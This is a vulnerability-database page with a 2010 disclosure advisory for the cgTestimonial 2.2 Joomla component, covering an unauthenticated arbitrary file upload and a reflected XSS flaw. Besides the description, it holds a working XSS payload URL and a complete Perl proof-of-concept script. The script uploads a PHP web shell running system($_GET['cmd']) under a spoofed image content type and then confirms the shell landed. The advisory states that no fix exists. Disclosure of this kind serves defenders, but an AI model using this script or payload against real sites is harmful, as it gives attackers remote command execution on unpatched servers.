Lucene search
K

Joomla! Component com_cgtestimonial 2.2 - Multiple Vulnerabilities

🗓️ 06 Aug 2010 00:00:00Reported by Salvatore FrestaType 
exploitpack
 exploitpack
👁 18 Views

cgTestimonial 2.2 Joomla Component - Multiple Vulnerabilities from Remote File Upload and XS

Code
cgTestimonial 2.2 Joomla Component Multiple Remote Vulnerabilities

 Name              cgTestimonial
 Vendor            http://www.cmsgalaxy.com
 Versions Affected 2.2

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-06

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION
________________________

cg_Testimonial   component   is   a  tool   for   adding
testimonial  by  the user from frontend and managing and
publishing testimonials from backend.
This  Joomla  extension  allows website user to submit a
testimonials  form  with  several  fields on one of your
site's  page  and enable  adding  testimonials by either
users or admin.


II. DESCRIPTION
_______________

Some parameters are not properly sanitised.The following
vulnerabilities can be exploited from guest users.


III. ANALYSIS
_____________

Summary:

 A) Multiple Arbitrary File Upload
 B) XSS
 

A) Multiple Arbitrary File Upload
_________________________________

The  usr_img  parameter  in cgtestimonial.php (frontend)
and in testimonial.php  (admin, without checks)  is  not
properly sanitised. A check  is executed on the content-
type HTTP field.


B) XSS
______

The url parameter in video.php is not properly sanitised
before being printed on screen.


IV. SAMPLE CODE
_______________

A) Multiple Arbitrary File Upload

http://poc.salvatorefresta.net/PoC-cgTestimonial2.2.pl.txt

B) XSS

http://site/path/components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>


V. FIX
______

No fix.

################################ PoC-cgTestimonial2.2.pl ################################

#!/usr/bin/perl
#
# PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component
#
# Author: Salvatore Fresta aka Drosophila
# Email:  [email protected]
#
# Date: 06 August 2010
#
# http://target/path/components/com_cgtestimonial/user_images/filename?cmd=command
#

use IO::Socket;


$usage = "\ncgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Fresta\n".
         "http://www.salvatorefresta.net\n\n".
         "Usage: perl PoC-cgTestimonial.pl <hostname> <path>\n\n";

$#ARGV == 1 || die $usage;

my $host      = $ARGV[0];
my $path      = $ARGV[1];

my $stop      = 0;
my $rand      = "master".int(rand 150);
my $shell     = "<?php echo \"<pre>\"; system(\$_GET['cmd']); echo \"</pre>\"; ?>";
my $filename  = "evil.php";

my $code      = "--AaB03x\r\n".
                "Content-Disposition: form-data; name=\"usr_img\"; filename=\"$filename\"\r\n".
                "Content-Type: image/jpeg\r\n".
                "\r\n".
                "$shell\r\n".
                "--AaB03x--";

my $pkg       = "POST ".$path."index.php?option=com_cgtestimonial&task=submit HTTP/1.1\r\n".
                "Host: $host\r\n".
                "Content-Type: multipart/form-data; boundary=AaB03x\r\n".
                "Content-Length: " .length($code). "\r\n".
                "\r\n".
                $code;

my $socket = new IO::Socket::INET( Proto=> "tcp",
                                   PeerAddr=> $host,
                                   PeerPort=> "80"
                                  ) or die "\n[-] Unable to connect to $host\n\n";

print "\n[+] Connected\n";
print $socket $pkg;

$pkg = "GET ".$path."components/com_cgtestimonial/user_images/".$filename." HTTP/1.1\r\n".
       "Host: $host\r\n\r\n";

print $socket $pkg;

while ((my $rec = <$socket>) && $stop != 1) {
  if($rec !=~ /302 Found/) {
    $stop = 1;
  }
}

if($stop != 1) {
  print "[-] Shell not uploaded\n";
  close($socket);
  exit;
}

print "[+] Shell uploaded on ".$host.$path."components/com_cgtestimonial/user_images/".$filename."\n".
      "[+] Disconnected\n\n";

close($socket);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation